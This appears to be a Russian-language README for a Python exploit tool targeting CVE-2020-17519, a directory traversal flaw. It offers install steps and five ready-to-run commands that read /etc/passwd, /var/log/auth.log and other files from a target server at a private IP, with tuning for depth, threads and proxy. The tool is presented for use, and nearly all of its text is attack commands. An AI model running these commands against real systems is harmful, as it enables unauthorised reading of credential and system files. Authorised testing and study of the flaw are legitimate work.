
Python-инструмент, использующий технику обхода каталогов для запроса файлов журналов с целевого URL. Отображает прогресс в реальном времени, поддерживает настройку прокси и опционально сохраняет корректные ответы.
requests и pwntools (pwn)argparse, os, concurrent.futures, threadinggit clone https://github.com/GazettEl/CVE-2020-17519.git
pip install requests pwntools
Инструмент можно запускать из командной строки с различными параметрами. Ниже приведены некоторые примеры:
Пример 1: Запрос одного пути к файлу
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-path /var/log/syslog --threads 1 --save
Пример 2: Запрос нескольких путей к файлам из списка
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 12 --file-list file_paths.txt --threads 4 --proxy none
Пример 3: Запуск с отключённым прокси
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 10 --file-path /var/log/auth.log --threads 2 --proxy none
Пример 4: Использование списка файлов и сохранение корректных ответов
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 15 --file-list paths.txt --threads 4 --save
Пример 5: Запрос одного файла с увеличенной глубиной
python CVE-2020-17519.py --target http://10.10.110.78:8081/ --depth 20 --file-path /etc/passwd --threads 1
Для получения дополнительных сведений обратитесь к исходному коду и встроенным комментариям.